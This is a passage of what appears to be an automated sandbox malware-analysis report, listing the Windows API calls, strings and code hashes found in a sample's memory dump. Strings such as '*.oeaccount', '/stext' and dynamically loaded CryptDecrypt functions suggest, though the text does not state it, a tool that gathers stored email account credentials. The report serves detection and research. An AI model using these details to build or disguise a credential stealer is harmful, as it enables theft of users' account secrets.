                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                              • API String ID: 889583718-2036018995
                                                                                                                                                              • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                              • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                              APIs
                                                                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3143880245-0
                                                                                                                                                              • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                              • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D5C
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D7A
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D98
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408DA8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                              APIs
                                                                                                                                                              • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,74DF0A60,00407A43,00000001,?,00000000,74DF0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                              • free.MSVCRT ref: 00406F6D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                                              • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                              • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                              • String ID: Arial
                                                                                                                                                              • API String ID: 3853255127-493054409
                                                                                                                                                              • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                              • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlen$_strcmpimemset
                                                                                                                                                              • String ID: /stext
                                                                                                                                                              • API String ID: 520177685-3817206916
                                                                                                                                                              • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                              • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 145871493-0
                                                                                                                                                              • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                              • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4165544737-0
                                                                                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                              APIs
                                                                                                                                                              • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                              APIs
                                                                                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                              • API String ID: 2238633743-192783356
                                                                                                                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
